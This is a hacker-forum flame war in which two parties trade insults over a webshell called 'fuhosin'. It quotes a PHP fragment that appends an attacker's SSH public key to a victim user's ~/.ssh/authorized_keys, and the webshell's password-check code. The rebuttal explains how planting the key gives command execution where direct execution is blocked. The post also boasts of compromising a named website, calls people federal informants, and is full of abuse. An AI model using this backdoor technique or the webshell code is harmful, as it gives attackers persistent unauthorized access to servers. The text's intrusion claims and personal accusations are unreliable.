add our SSH public RSA keys to the list of authorized ones $pk = “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9itZ/PPfGNn2PArA94f0bTP/Mpz2aRo6eLMgdexoJQ++ToWndXgxs3KzQCLza2mICHiH+nNNaa+PmEjnppHJGk3Rb8vtR8ojirpXvdcaRI+on/zPkGJB54c123IN0jwVPFFjCvCQQNpZtpBQMoeXYRTNNmX6lif1uuCm5LjxfPOR2lRG0dNIVW5SsAiuhXBRNWguVN/ctuKK2MhLWJ31HnGk4g2Qv0270sb4BSpkcQRGX6ZitN5KHnS12sjtvvfc/h5vn0bzt5YP4rA4NTwWEGeLxABzCvW9hXL+b3D9XLhP6alE6HOgJNT+TATRjnFScfrdBd91XPso0dD1FcXRv fuck@suhosin”; $home = get_home(); @mkdir($home.”/.ssh”); if(file_exists($home.”/.ssh/authorized_keys”)) { $ak = file_get_contents($home.”/.ssh/authorized_keys”);

and wala…

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9itZ/PPfGNn2PArA94f0bTP/Mpz2aRo6eLMgdexoJQ++ToWndXgxs3KzQCLza2mICHiH+nNNaa+PmEjnppHJGk3Rb8vtR8ojirpXvdcaRI+on/zPkGJB54c123IN0jwVPFFjCvCQQNpZtpBQMoeXYRTNNmX6lif1uuCm5LjxfPOR2lRG0dNIVW5SsAiuhXBRNWguVN/ctuKK2MhLWJ31HnGk4g2Qv0270sb4BSpkcQRGX6ZitN5KHnS12sjtvvfc/h5vn0bzt5YP4rA4NTwWEGeLxABzCvW9hXL+b3D9XLhP6alE6HOgJNT+TATRjnFScfrdBd91XPso0dD1FcXRv fuck@suhosin

bahahaha… no not ONLY this but…heck…when you have this ;

BUT theyre worst errors, are simple.. they use simple passes, ie; ‘fuhosin’ for theyre webshell logins…and they call me, outdated..yet, use a fucking pathetic HTP-modified version of Fuhosin (can be found on my github.com/x90 …

NOW for sshd …seems, theyre even stupider,and, they maybe, forgot how md5 works ??? lol…
if(isset($_POST['dongpass']) && !empty($password)) {
if(strlen($password) == 32) {
$_POST['dongpass'] = md5($_POST['dongpass']);
}
if($_POST['dongpass'] == $password)
setcookie("dongs", $_POST['dongpass'], time()+3600);
} else {
echo "";
}
reload();
}
Challenge removed, only PROS will be considered.

CANNOT CODE EVEN A HELLO WORLD! ,AND OCEAN, I DIDNT STEAL YOUR SHIT.. IT IS, ANYONE COULD HAVE,AND, I DONT USE THEM…

they are born of narq, and, the ONLY person id take that back on is the kid ac1d , from bluehell.org ,whom, seems to, well.. not hang with the miscreant,low iq’d ‘ocean’ … anyhow, the challange is there.. id even give you, local, unrestricted ax, just to watch you fail in YOUR attempt…as all wargames, i would have to give you a shell, to try win the ‘war” ,right ? well, my one, wont be logging, and wont be a root…and, if i was some narq, id be doing what theyre doing now,wich is, trying to have me arrested..
and whoever owns beeimg.com , i feel sorry for you ;) (your owned x5)…"

Congrats, you don't understand jack shit! The keys in fuhosin are used as a method to bypass anything stopping code execution, this is trivial but I'll give you a small explanation, xd, listen, maybe you'll learn something? Doubt it :P

It adds a pubkey into the user's .ssh folder, so assume we can't exec code, normally, and say we're running as the user 'bob', well, the shell will attempt to add a key into /home/bob/.ssh, then use a ssh-like lib to use that as a method of execution. Regarding 'sshd', you're completely off, it has nothing to do with that, and it seems you can't read basic code, dongpass, it's passing an md5 val, it checks it, if it's correct/matches we login and 'wala'. Challenge removed? LOL, we came into your lame ircd, asked for your challenge, and got banned in return, can't support your claims so you removed it, huh?

Oh, we can code a hello world ez pz, but xd can't :P. He talks of us being born of narq, but then he says he'd take ac1d, aka a KNOWN narq, federal informant, etc..ironic..."Low iq'd ocean"..hahahaha, let me, ocean give you a lesson on IQ.

[ First off, I (ocean), have taken several tests, from Wechsler to WISC to Stanford-Binet, on the typical IQ scale, where 100 is average, I score around 147, which in theory puts me @ the tier of a genius. If you call that low, you don't understand what you talk about, second off, the whole concept of a number to represent/measure someone's intelligence is absurd, just like the concept of the bell curve, something that is deprecated. The whole idea behind IQ was first created to see if someone was a plain out retard (such as yourself, xd) or if someone was average (this was during the war). Now the reason that it is absurd is because IQ tests don't measure every single aspect of the human brain, for example, someone may be much more talented naturally in arts vs a more logical or mathematical brain. The bell curve brings race into the game, and there are no significant, *note (non-biased) studies that support that race plays a factor/role in intelligence. If you want to argue with me, (xd), I recommend you read a bit of Chomsky's work, the book 'The Bell Curve', and misc things that will help you understand the human brain. Feel free to correct me, because I don't take offence to expansion of knowledge.

~ schooled by ocean ]

Once again, we asked for your shell for the challenge, you didn't give it, you just talked more shit. Trying to have you arrested? Why would we waste time trying to get an inferior scum like you arrested? You make me chuckle. Oh, you owned beeimg.com too? Weird, you said that back when I was on ircd, I told you to rm it, and you didn't? Yeah, talking more shit as usual, cute.

Thanks for reading.